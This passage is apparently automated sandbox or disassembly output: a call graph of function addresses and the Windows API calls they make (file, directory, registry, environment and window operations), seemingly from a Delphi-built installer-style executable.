40e65c 56067->56110 56128 40d640 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56068->56128 56078 40d964 5 API calls 56070->56078 56136 40e024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56071->56136 56141 40ea90 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56072->56141 56082 40d964 5 API calls 56073->56082 56129 40d964 56074->56129 56139 40eba8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56075->56139 56135 40da18 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56076->56135 56138 40dfe4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56077->56138 56087 40e719 56078->56087 56081 403400 4 API calls 56088 40e7eb 56081->56088 56089 40e77e 56082->56089 56093 40e723 56087->56093 56094 40e71d 56087->56094 56088->56032 56095 40e782 56089->56095 56096 40e79b 56089->56096 56090 40e6e4 56140 409f38 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56090->56140 56092 40e6a0 56137 40d670 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56092->56137 56142 40ec08 56093->56142 56102 40e721 56094->56102 56103 40e73c 56094->56103 56105 40ec08 5 API calls 56095->56105 56148 40e024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56096->56148 56098 40e661 56134 40e0d8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56098->56134 56099 40e644 56132 40e024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56099->56132 56146 40e024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56102->56146 56108 40ec08 5 API calls 56103->56108 56105->56110 56112 40e744 56108->56112 56109 40e64f 56133 40e46c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56109->56133 56110->56081 56145 40daa0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56112->56145 56114 40e766 56147 40e4d4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56114->56147 56149 40bbd0 56117->56149 56120->56025 56121->56025 56122 40d974 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56122->56032 56124 40d98b 56123->56124 56125 40d9c5 56124->56125 56127 40d9cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56124->56127 56125->56060 56127->56124 56128->56067 56130 40ec08 5 API calls 56129->56130 56131 40d96e 56130->56131 56131->56098 56131->56099 56132->56109 56133->56110 56134->56110 56135->56110 56136->56092 56137->56110 56138->56110 56139->56090 56140->56110 56141->56110 56143 40d980 5 API calls 56142->56143 56144 40ec15 56143->56144 56144->56110 56145->56110 56146->56114 56147->56110 56148->56110 56150 40bbe2 56149->56150 56152 40bc07 56149->56152 56150->56152 56153 40bc84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56150->56153 56152->56032 56152->56122 56153->56152 56155 40ec08 5 API calls 56154->56155 56156 40d6c9 56155->56156 56157 40d6dc 56156->56157 56161 40ed0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56156->56161 56157->56016 56159 40d6d7 56162 40d658 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56159->56162 56161->56159 56162->56157 56164 40d964 5 API calls 56163->56164 56165 40e16b 56164->56165 56166 40ec08 5 API calls 56165->56166 56169 40dd93 56165->56169 56167 40e178 56166->56167 56167->56169 56174 40e0d8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56167->56174 56169->56046 56175 40ad7c 19 API calls 56170->56175 56172 40dc00 56172->56056 56173->56056 56174->56169 56175->56172 50051 491444 50052 49147e 50051->50052 50053 49148a 50052->50053 50054 491480 50052->50054 50056 491499 50053->50056 50057 4914c2 50053->50057 50247 4090a0 MessageBeep 50054->50247 50059 447008 18 API calls 50056->50059 50062 4914fa 50057->50062 50063 4914d1 50057->50063 50058 403420 4 API calls 50060 491ad6 50058->50060 50061 4914a6 50059->50061 50064 403400 4 API calls 50060->50064 50248 406bb8 50061->50248 50072 491509 50062->50072 50073 491532 50062->50073 50066 447008 18 API calls 50063->50066 50067 491ade 50064->50067 50069 4914de 50066->50069 50256 406c08 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50069->50256 50075 447008 18 API calls 50072->50075 50078 49155a 50073->50078 50079 491541 50073->50079 50074 4914e9 50257 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50074->50257 50077 491516 50075->50077 50258 406c3c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50077->50258 50086 491569 50078->50086 50087 49158e 50078->50087 50260 407288 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetCurrentDirectoryA 50079->50260 50082 491521 50259 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50082->50259 50083 491549 50261 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50083->50261 50088 447008 18 API calls 50086->50088 50090 49159d 50087->50090 50094 4915c6 50087->50094 50089 491576 50088->50089 50262 4072b0 50089->50262 50093 447008 18 API calls 50090->50093 50092 49157e 50265 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50092->50265 50096 4915aa 50093->50096 50097 4915fe 50094->50097 50098 4915d5 50094->50098 50266 42c814 50096->50266 50106 49164a 50097->50106 50107 49160d 50097->50107 50101 447008 18 API calls 50098->50101 50099 491485 50099->50058 50103 4915e2 50101->50103 50276 407200 8 API calls 50103->50276 50112 491659 50106->50112 50113 491682 50106->50113 50109 447008 18 API calls 50107->50109 50108 4915ed 50277 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50108->50277 50111 49161c 50109->50111 50114 447008 18 API calls 50111->50114 50115 447008 18 API calls 50112->50115 50119 4916ba 50113->50119 50120 491691 50113->50120 50116 49162d 50114->50116 50117 491666 50115->50117 50278 491148 8 API calls 50116->50278 50280 42c8b4 50117->50280 50129 4916c9 50119->50129 50130 4916f2 50119->50130 50123 447008 18 API calls 50120->50123 50121 491639 50279 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50121->50279 50126 49169e 50123->50126 50286 42c8dc 50126->50286 50132 447008 18 API calls 50129->50132 50135 49172a 50130->50135 50136 491701 50130->50136 50134 4916d6 50132->50134 50295 42c90c LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 50134->50295 50143 491739 50135->50143 50144 491762 50135->50144 50138 447008 18 API calls 50136->50138 50140 49170e 50138->50140 50139 4916e1 50296 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50139->50296 50297 42c93c 50140->50297 50146 447008 18 API calls 50143->50146 50150 4917ae 50144->50150 50151 491771 50144->50151 50147 491746 50146->50147 50303 42c964 50147->50303 50156 4917bd 50150->50156 50157 491800 50150->50157 50153 447008 18 API calls 50151->50153 50155 491780 50153->50155 50158 447008 18 API calls 50155->50158 50159 447008 18 API calls 50156->50159 50163 49180f 50157->50163 50164 491873 50157->50164 50160 491791 50158->50160 50161 4917d0 50159->50161 50309 42c508 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 50160->50309 50165 447008 18 API calls 50161->50165 50167 447008 18 API calls 50163->50167 50172 4918b2 50164->50172 50173 491882 50164->50173 50168 4917e1 50165->50168 50166 49179d 50310 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50166->50310 50170 49181c 50167->50170 50311 491340 12 API calls 50168->50311 50239 42c618 7 API calls 50170->50239 50184 4918f1 50172->50184 50185 4918c1 50172->50185 50176 447008 18 API calls 50173->50176 50175 4917ef 50312 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50175->50312 50179 49188f 50176->50179 50177 49182a 50180 49182e 50177->50180 50181 491863 50177->50181 50315 4528f4 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection DeleteFileA GetLastError 50179->50315 50183 447008 18 API calls 50180->50183 50314 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50181->50314 50188 49183d 50183->50188 50193 491930 50184->50193 50194 491900 50184->50194 50189 447008 18 API calls 50185->50189 50187 49189c 50316 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50187->50316 50240 452c6c 50188->50240 50192 4918ce 50189->50192 50317 45275c 50192->50317 50203 491978 50193->50203 50204 49193f 50193->50204 50199 447008 18 API calls 50194->50199 50195 4918ad 50195->50099 50196 49184d 50313 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50196->50313 50198 4918db 50324 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50198->50324 50202 49190d 50199->50202 50325 452dfc Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 50202->50325 50211 4919c0 50203->50211 50212 491987 50203->50212 50206 447008 18 API calls 50204->50206 50208 49194e 50206->50208 50207 49191a 50326 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50207->50326 50210 447008 18 API calls 50208->50210 50213 49195f 50210->50213 50216 4919d3 50211->50216 50223 491a89 50211->50223 50214 447008 18 API calls 50212->50214 50219 447288 5 API calls 50213->50219 50215 491996 50214->50215 50217 447008 18 API calls 50215->50217 50220 447008 18 API calls 50216->50220 50218 4919a7 50217->50218 50224 447288 5 API calls 50218->50224 50219->50099 50221 491a00 50220->50221 50222 447008 18 API calls 50221->50222 50225 491a17 50222->50225 50223->50099 50330 446fac 18 API calls 50223->50330 50224->50099 50327 407de4 7 API calls 50225->50327 50227 491aa2 50331 42e8d8 FormatMessageA 50227->50331 50232 491a39 50233 447008 18 API calls 50232->50233 50234 491a4d 50233->50234 50328 408510 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50234->50328 50236 491a58 50329 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50236->50329 50238 491a64 50239->50177 50336 452710 50240->50336 50242 452c89 50242->50196 50243 452c85 50243->50242 50244 452cad MoveFileA GetLastError 50243->50244 50342 45274c 50244->50342 50247->50099 50249 406bc7 50248->50249 50250 406be0 50249->50250 50251 406be9 50249->50251 50252 403400 4 API calls 50250->50252 50345 403778 50251->50345 50253 406be7 50252->50253 50255 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50253->50255 50255->50099 50256->50074 50257->50099 50258->50082 50259->50099 50260->50083 50261->50099 50263 403738 50262->50263 50264 4072ba SetCurrentDirectoryA 50263->50264 50264->50092 50265->50099 50267 403738 50266->50267 50268 42c837 GetFullPathNameA 50267->50268 50269 42c843 50268->50269 50270 42c85a 50268->50270 50269->50270 50271 42c84b 50269->50271 50272 403494 4 API calls 50270->50272 50274 4034e0 4 API calls 50271->50274 50273 42c858 50272->50273 50275 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50273->50275 50274->50273 50275->50099 50276->50108 50277->50099 50278->50121 50279->50099 50352 42c7ac 50280->50352 50283 403778 4 API calls 50284 42c8d5 50283->50284 50285 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50284->50285 50285->50099 50367 42c684 50286->50367 50289 42c8f0 50291 403400 4 API calls 50289->50291 50290 42c8f9 50292 403778 4 API calls 50290->50292 50293 42c8f7 50291->50293 50292->50293 50294 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50293->50294 50294->50099 50295->50139 50296->50099 50298 42c7ac IsDBCSLeadByte 50297->50298 50299 42c94c 50298->50299 50300 403778 4 API calls 50299->50300 50301 42c95e 50300->50301 50302 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50301->50302 50302->50099 50304 42c7ac IsDBCSLeadByte 50303->50304 50305 42c974 50304->50305 50306 403778 4 API calls 50305->50306 50307 42c985 50306->50307 50308 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50307->50308 50308->50099 50309->50166 50310->50099 50311->50175 50312->50099 50313->50099 50314->50099 50315->50187 50316->50195 50318 452710 2 API calls 50317->50318 50319 452772 50318->50319 50320 452776 50319->50320 50321 452794 CreateDirectoryA GetLastError 50319->50321 50320->50198 50322 45274c Wow64RevertWow64FsRedirection 50321->50322 50323 4527ba 50322->50323 50323->50198 50324->50099 50325->50207 50326->50099 50327->50232 50328->50236 50329->50238 50330->50227 50332 42e8fe 50331->50332 50333 4034e0 4 API calls 50332->50333 50334 42e91b 50333->50334 50335 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50334->50335 50335->50099 50337 45271e 50336->50337 50338 45271a 50336->50338 50339 452727 Wow64DisableWow64FsRedirection 50337->50339 50340 452740 SetLastError 50337->50340 50338->50243 50341 45273b 50339->50341 50340->50341 50341->50243 50343 452751 Wow64RevertWow64FsRedirection 50342->50343 50344 45275b 50342->50344 50343->50344 50344->50196 50346 4037aa 50345->50346 50347 40377d 50345->50347 50348 403400 4 API calls 50346->50348 50347->50346 50349 403791 50347->50349 50351 4037a0 50348->50351 50350 4034e0 4 API calls 50349->50350 50350->50351 50351->50253 50357 42c68c 50352->50357 50354 42c80b 50354->50283 50355 42c7c1 50355->50354 50364 42c454 IsDBCSLeadByte 50355->50364 50358 42c69d 50357->50358 50359 42c701 50358->50359 50363 42c6bb 50358->50363 50361 42c6fc 50359->50361 50366 42c454 IsDBCSLeadByte 50359->50366 50361->50355 50363->50361 50365 42c454 IsDBCSLeadByte 50363->50365 50364->50355 50365->50363 50366->50361 50368 42c68c IsDBCSLeadByte 50367->50368 50369 42c68b 50368->50369 50369->50289 50369->50290 50370 41364c SetWindowLongA GetWindowLongA 50371 4136a9 SetPropA SetPropA 50370->50371 50372 41368b GetWindowLongA 50370->50372 50376 41f3ac 50371->50376 50372->50371 50373 41369a SetWindowLongA 50372->50373 50373->50371 50381 415280 50376->50381 50388 423c1c 50376->50388 50482 423a94 50376->50482 50377 4136f9 50382 41528d 50381->50382 50383 4152f3 50382->50383 50384 4152e8 50382->50384 50387 4152f1 50382->50387 50489 424b9c 13 API calls 50383->50489 50384->50387 50490 41506c 46 API calls 50384->50490 50387->50377 50404 423c52 50388->50404 50391 423cfc 50393 423d03 50391->50393 50394 423d37 50391->50394 50392 423c9d 50395 423ca3 50392->50395 50396 423d60 50392->50396 50397 423d09 50393->50397 50440 423fc1 50393->50440 50399 423d42 50394->50399 50400 4240aa IsIconic 50394->50400 50398 423ca8 50395->50398 50414 423cd5 50395->50414 50401 423d72 50396->50401 50402 423d7b 50396->50402 50406 423f23 SendMessageA 50397->50406 50407 423d17 50397->50407 50410 423e06 50398->50410 50411 423cae 50398->50411 50412 4240e6 50399->50412 50413 423d4b 50399->50413 50408 423c73 50400->50408 50409 4240be GetFocus 50400->50409 50403 423d88 50401->50403 50415 423d79 50401->50415 50500 4241a4 11 API calls 50402->50500 50501 4241ec IsIconic 50403->50501 50404->50408 50491 423b78 50404->50491 50406->50408 50407->50408 50441 423cd0 50407->50441 50461 423f66 50407->50461 50408->50377 50409->50408 50417 4240cf 50409->50417 50513 423b94 NtdllDefWindowProc_A 50410->50513 50418 423cb7 50411->50418 50419 423e2e PostMessageA 50411->50419 50535 424860 WinHelpA PostMessageA 50412->50535 50422 4240fd 50413->50422 50413->50441 50414->50408 50431 423cee 50414->50431 50432 423e4f 50414->50432 50509 423b94 NtdllDefWindowProc_A 50415->50509 50534 41f004 GetCurrentThreadId 73EA5940 50417->50534 50426 423cc0 50418->50426 50427 423eb5 50418->50427 50519 423b94 NtdllDefWindowProc_A 50419->50519 50429 424106 50422->50429 50430 42411b 50422->50430 50435 423cc9 50426->50435 50436 423dde IsIconic 50426->50436 50437 423ebe 50427->50437 50438 423eef 50427->50438 50428 423e49 50428->50408 50536 4244e4 50429->50536 50542 42453c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 50430->50542 50431->50441 50442 423e1b 50431->50442 50495 423b94 NtdllDefWindowProc_A 50432->50495 50434 4240d6 50434->50408 50445 4240de SetFocus 50434->50445 50435->50441 50446 423da1 50435->50446 50448 423dfa 50436->50448 50449 423dee 50436->50449 50521 423b24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 50437->50521 50496 423b94 NtdllDefWindowProc_A 50438->50496 50440->50408 50456 423fe7 IsWindowEnabled 50440->50456 50441->50408 50499 423b94 NtdllDefWindowProc_A 50441->50499 50514 424188 50442->50514 50444 423e55 50453 423e93 50444->50453 50454 423e71 50444->50454 50445->50408 50446->50408 50510 422c5c ShowWindow PostMessageA PostQuitMessage 50446->50510 50512 423b94 NtdllDefWindowProc_A 50448->50512 50511 423bd0 15 API calls 50449->50511 50462 423a94 6 API calls 50453->50462 50520 423b24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 50454->50520 50455 423ec6 50464 423ed8 50455->50464 50522 41ef68 50455->50522 50456->50408 50465 423ff5 50456->50465 50459 423ef5 50466 423f0d 50459->50466 50497 41eeb4 GetCurrentThreadId 73EA5940 50459->50497 50461->50408 50468 423f88 IsWindowEnabled 50461->50468 50469 423e9b PostMessageA 50462->50469 50528 423b94 NtdllDefWindowProc_A 50464->50528 50475 423ffc IsWindowVisible 50465->50475 50473 423a94 6 API calls 50466->50473 50467 423e79 PostMessageA 50467->50408 50468->50408 50474 423f96 50468->50474 50469->50408 50473->50408 50529 412320 7 API calls 50474->50529 50475->50408 50477 42400a GetFocus 50475->50477 50530 4181f0 50477->50530 50479 42401f SetFocus 50532 415250 50479->50532 50483 423b1d 50482->50483 50484 423aa4 50482->50484 50483->50377 50484->50483 50485 423aaa EnumWindows 50484->50485 50485->50483 50486 423ac6 GetWindow GetWindowLongA 50485->50486 50646 423a2c GetWindow 50485->50646 50487 423ae5 50486->50487 50487->50483 50488 423b11 SetWindowPos 50487->50488 50488->50483 50488->50487 50489->50387 50490->50387 50492 423b82 50491->50492 50493 423b8d 50491->50493 50492->50493 50543 408728 GetSystemDefaultLCID 50492->50543 50493->50391 50493->50392 50495->50444 50496->50459 50498 41ef39 50497->50498 50498->50466 50499->50408 50500->50408 50502 424233 50501->50502 50503 4241fd SetActiveWindow 50501->50503 50502->50408 50618 42365c 50503->50618 50507 42421a 50507->50502 50508 42422d SetFocus 50507->50508 50508->50502 50509->50408 50510->50408 50511->50408 50512->50408 50513->50408 50631 41db40 50514->50631 50517 4241a0 50517->50408 50518 424194 LoadIconA 50518->50517 50519->50428 50520->50467 50521->50455 50523 41ef70 IsWindow 50522->50523 50524 41ef9c 50522->50524 50525 41ef7f EnableWindow 50523->50525 50527 41ef8a 50523->50527 50524->50464 50525->50527 50526 402660 4 API calls 50526->50527 50527->50523 50527->50524 50527->50526 50528->50408 50529->50408 50531 4181fa 50530->50531 50531->50479 50533 41526b SetFocus 50532->50533 50533->50408 50534->50434 50535->50428 50537 4244f0 50536->50537 50538 42450a 50536->50538 50539 42451f 50537->50539 50540 4244f7 SendMessageA 50537->50540 50541 402648 4 API calls 50538->50541 50539->50408 50540->50539 50541->50539 50542->50428 50598 408570 GetLocaleInfoA 50543->50598 50548 408570 5 API calls 50549 40877d 50548->50549 50550 408570 5 API calls 50549->50550 50551 4087a1 50550->50551 50610 4085bc GetLocaleInfoA 50551->50610 50554 4085bc GetLocaleInfoA 50555 4087d1 50554->50555 50556 408570 5 API calls 50555->50556 50557 4087eb 50556->50557 50558 4085bc GetLocaleInfoA 50557->50558 50559 408808 50558->50559 50560 408570 5 API calls 50559->50560 50561 408822 50560->50561 50562 403450 4 API calls 50561->50562 50563 40882f 50562->50563 50564 408570 5 API calls 50563->50564 50565 408844 50564->50565 50566 403450 4 API calls 50565->50566 50567 408851 50566->50567 50568 4085bc GetLocaleInfoA 50567->50568 50569 40885f 50568->50569 50570 408570 5 API calls 50569->50570 50571 408879 50570->50571 50572 403450 4 API calls 50571->50572 50573 408886 50572->50573 50574 408570 5 API calls 50573->50574 50575 40889b 50574->50575 50576 403450 4 API calls 50575->50576 50577 4088a8 50576->50577 50578 408570 5 API calls 50577->50578 50579 4088bd 50578->50579 50580 4088da 50579->50580 50581 4088cb 50579->50581 50583 403494 4 API calls 50580->50583 50582 403494 4 API calls 50581->50582 50599 408597 50598->50599 50600 4085a9 50598->50600 50601 4034e0 4 API calls 50599->50601 50602 403494 4 API calls 50600->50602 50603 4085a7 50601->50603 50602->50603 50604 403450 50603->50604 50605 403454 50604->50605 50608 403464 50604->50608 50607 4034bc 4 API calls 50605->50607 50605->50608 50606 403490 50606->50548 50607->50608 50608->50606 50609 402660 4 API calls 50608->50609 50609->50606 50611 4085d8 50610->50611 50611->50554 50627 423608 SystemParametersInfoA 50618->50627 50621 423675 ShowWindow 50623 423680 50621->50623 50624 423687 50621->50624 50630 423638 SystemParametersInfoA 50623->50630 50626 423b24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 50624->50626 50626->50507 50628 423626 50627->50628 50628->50621 50629 423638 SystemParametersInfoA 50628->50629 50629->50621 50630->50624 50634 41db64 50631->50634 50635 41db4a 50634->50635 50636 41db71 50634->50636 50635->50517 50635->50518 50636->50635 50643 40cc80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 50636->50643 50638 41db8e 50638->50635 50639 41dba8 50638->50639 50640 41db9b 50638->50640 50644 41bd9c 11 API calls 50639->50644 50645 41b398 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 50640->50645 50643->50638 50644->50635 50645->50635 50647 423a4d GetWindowLongA 50646->50647 50648 423a59 50646->50648 50647->50648 50649 4804c6 50650 4804cf 50649->50650 50651 4804fa 50649->50651 50650->50651 50652 4804ec 50650->50652 50654 480539 50651->50654 51063 47efb0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50651->51063 51061 476b6c 188 API calls 50652->51061 50655 48055d 50654->50655 50659 480550 50654->50659 50660 480552 50654->50660 50662 480599 50655->50662 50663 48057b 50655->50663 50657 4804f1 50657->50651 51062 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 50657->51062 50658 48052c 51064 47f018 42 API calls 50658->51064 50666 47eff4 42 API calls 50659->50666 51065 47f088 42 API calls 50660->51065 51068 47ee48 24 API calls 50662->51068 50667 480590 50663->50667 51066 47f018 42 API calls 50663->51066 50666->50655 51067 47ee48 24 API calls 50667->51067 50669 480597 50672 4805a9 50669->50672 50673 4805af 50669->50673 50674 4805ad 50672->50674 50775 47eff4 50672->50775 50673->50674 50675 47eff4 42 API calls 50673->50675 50780 47c3a4 50674->50780 50675->50674 51137 47eadc 42 API calls 50775->51137 50777 47f00f 51138 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 50777->51138 51139 42d8a8 GetWindowsDirectoryA 50780->51139 50782 47c3c2 50783 403450 4 API calls 50782->50783 50784 47c3cf 50783->50784 51141 42d8d4 GetSystemDirectoryA 50784->51141 50786 47c3d7 50787 403450 4 API calls 50786->50787 50788 47c3e4 50787->50788 51143 42d900 50788->51143 50790 47c3ec 50791 403450 4 API calls 50790->50791 50792 47c3f9 50791->50792 50793 47c402 50792->50793 50794 47c41e 50792->50794 51199 42d218 50793->51199 50795 403400 4 API calls 50794->50795 50797 47c41c 50795->50797 50799 47c463 50797->50799 50801 42c8dc 5 API calls 50797->50801 51147 47c22c 50799->51147 50800 403450 4 API calls 50800->50797 50803 47c43e 50801->50803 50805 403450 4 API calls 50803->50805 50807 47c44b 50805->50807 50806 403450 4 API calls 50808 47c47f 50806->50808 50807->50799 50812 403450 4 API calls 50807->50812 50809 47c49d 50808->50809 50810 4035c0 4 API calls 50808->50810 50811 47c22c 8 API calls 50809->50811 50810->50809 50813 47c4ac 50811->50813 50812->50799 50814 403450 4 API calls 50813->50814 50815 47c4b9 50814->50815 50816 47c4e1 50815->50816 50817 42c40c 5 API calls 50815->50817 50818 47c548 50816->50818 50822 47c22c 8 API calls 50816->50822 50819 47c4cf 50817->50819 50820 47c572 50818->50820 50821 47c551 50818->50821 50824 4035c0 4 API calls 50819->50824 51158 42c40c 50820->51158 50825 42c40c 5 API calls 50821->50825 50826 47c4f9 50822->50826 50824->50816 50828 47c55e 50825->50828 50829 403450 4 API calls 50826->50829 50832 47c506 50829->50832 51061->50657 51063->50658 51064->50654 51065->50655 51066->50667 51067->50669 51068->50669 51137->50777 51140 42d8c9 51139->51140 51140->50782 51142 42d8f5 51141->51142 51142->50786 51144 403400 4 API calls 51143->51144 51145 42d910 GetModuleHandleA GetProcAddress 51144->51145 51146 42d929 51145->51146 51146->50790 51209 42de2c 51147->51209 51149 47c252 51150 47c256 51149->51150 51151 47c278 51149->51151 51212 42dd5c 51150->51212 51152 403400 4 API calls 51151->51152 51154 47c27f 51152->51154 51154->50806 51156 47c26d RegCloseKey 51156->51154 51157 403400 4 API calls 51157->51156 51159 42c416 51158->51159 51160 42c439 51158->51160 51200 4038a4 4 API calls 51199->51200 51202 42d22b 51200->51202 51201 42d242 GetEnvironmentVariableA 51201->51202 51203 42d24e 51201->51203 51202->51201 51206 42d255 51202->51206 51247 42dbe0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51202->51247 51204 403400 4 API calls 51203->51204 51204->51206 51206->50800 51210 42de37 51209->51210 51211 42de3d RegOpenKeyExA 51209->51211 51210->51211 51211->51149 51215 42dc10 51212->51215 51216 42dc36 RegQueryValueExA 51215->51216 51221 42dc59 51216->51221 51229 42dc7b 51216->51229 51217 403400 4 API calls 51219 42dd47 51217->51219 51218 42dc73 51220 403400 4 API calls 51218->51220 51219->51156 51219->51157 51220->51229 51221->51218 51222 4034e0 4 API calls 51221->51222 51221->51229 51232 403744 51221->51232 51222->51221 51224 42dcb0 RegQueryValueExA 51224->51216 51225 42dccc 51224->51225 51225->51229 51236 4038a4 51225->51236 51229->51217 51230 403744 4 API calls 51231 42dd20 51230->51231 51233 40374a 51232->51233 51235 40375b 51232->51235 51234 4034bc 4 API calls 51233->51234 51233->51235 51234->51235 51235->51224 51237 4038b1 51236->51237 51243 4038e1 51236->51243 51239 4038da 51237->51239 51241 4038bd 51237->51241 51238 403400 4 API calls 51244 4038cb 51238->51244 51240 4034bc 4 API calls 51239->51240 51240->51243 51245 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51241->51245 51243->51238 51244->51230 51244->51231 51245->51244 51247->51202 53303 46be48 53304 46c254 53303->53304 53305 46be7c 53303->53305 53306 403400 4 API calls 53304->53306 53307 46beb8 53305->53307 53310 46bf14 53305->53310 53311 46bef2 53305->53311 53312 46bf03 53305->53312 53313 46bed0 53305->53313 53314 46bee1 53305->53314 53308 46c293 53306->53308 53307->53304 53389 468fe0 53307->53389 53316 403400 4 API calls 53308->53316 53621 46bdd8 45 API calls 53310->53621 53354 46ba08 53311->53354 53620 46bbc8 67 API calls 53312->53620 53618 46b758 47 API calls 53313->53618 53619 46b8c0 42 API calls 53314->53619 53321 46c29b 53316->53321 53322 46bed6 53322->53304 53322->53307 53323 46bf50 53323->53304 53324 494770 18 API calls 53323->53324 53340 46bf93 53323->53340 53324->53340 53326 414af8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53326->53340 53327 46c0b6 53622 48300c 123 API calls 53327->53622 53330 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53330->53340 53331 42cbd0 6 API calls 53331->53340 53332 46c0d1 53332->53304 53334 46b2a0 23 API calls 53334->53340 53337 46c136 53341 457d58 24 API calls 53337->53341 53338 46c17c 53342 46b2a0 23 API calls 53338->53342 53339 46c18e 53468 46b2a0 53339->53468 53340->53304 53340->53326 53340->53327 53340->53330 53340->53331 53340->53334 53340->53337 53340->53338 53340->53339 53392 468f1c 53340->53392 53400 46b00c 53340->53400 53407 46a26c 53340->53407 53545 482b0c 53340->53545 53631 46b514 19 API calls 53340->53631 53344 46c155 53341->53344 53342->53304 53345 457d58 24 API calls 53344->53345 53345->53338 53346 46c19b 53347 46c1c4 SetActiveWindow 53346->53347 53348 46c1dc 53346->53348 53347->53348 53503 46a60c 53348->53503 53350 46c1ff 53350->53338 53351 46c21a 53350->53351 53623 46b11c 53351->53623 53632 46c6cc 53354->53632 53357 46bb8a 53358 403420 4 API calls 53357->53358 53360 46bba4 53358->53360 53362 403400 4 API calls 53360->53362 53361 46ba56 53363 46bb76 53361->53363 53639 455f70 13 API calls 53361->53639 53365 46bbac 53362->53365 53363->53357 53364 403450 4 API calls 53363->53364 53364->53357 53367 403400 4 API calls 53365->53367 53368 46bbb4 53367->53368 53368->53307 53369 42cd58 7 API calls 53373 46bb12 53369->53373 53370 46bb39 53370->53357 53370->53363 53375 42cd58 7 API calls 53370->53375 53371 46bad9 53371->53357 53371->53369 53371->53370 53372 46ba74 53372->53371 53640 46696c 53372->53640 53373->53370 53377 451444 4 API calls 53373->53377 53378 46bb4f 53375->53378 53380 46bb29 53377->53380 53378->53363 53383 451444 4 API calls 53378->53383 53379 46696c 19 API calls 53381 46bab4 53379->53381 53645 47eadc 42 API calls 53380->53645 53385 451414 4 API calls 53381->53385 53384 46bb66 53383->53384 53646 47eadc 42 API calls 53384->53646 53387 46bac9 53385->53387 53644 47eadc 42 API calls 53387->53644 53390 468f1c 19 API calls 53389->53390 53391 468fef 53390->53391 53391->53323 53393 468f4b 53392->53393 53394 4078fc 19 API calls 53393->53394 53397 468f8c 53393->53397 53395 468f84 53394->53395 53766 453330 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53395->53766 53398 403400 4 API calls 53397->53398 53399 468fa4 53398->53399 53399->53340 53401 46b01d 53400->53401 53402 46b018 53400->53402 53852 469dec 46 API calls 53401->53852 53403 46b01b 53402->53403 53767 46aa78 53402->53767 53403->53340 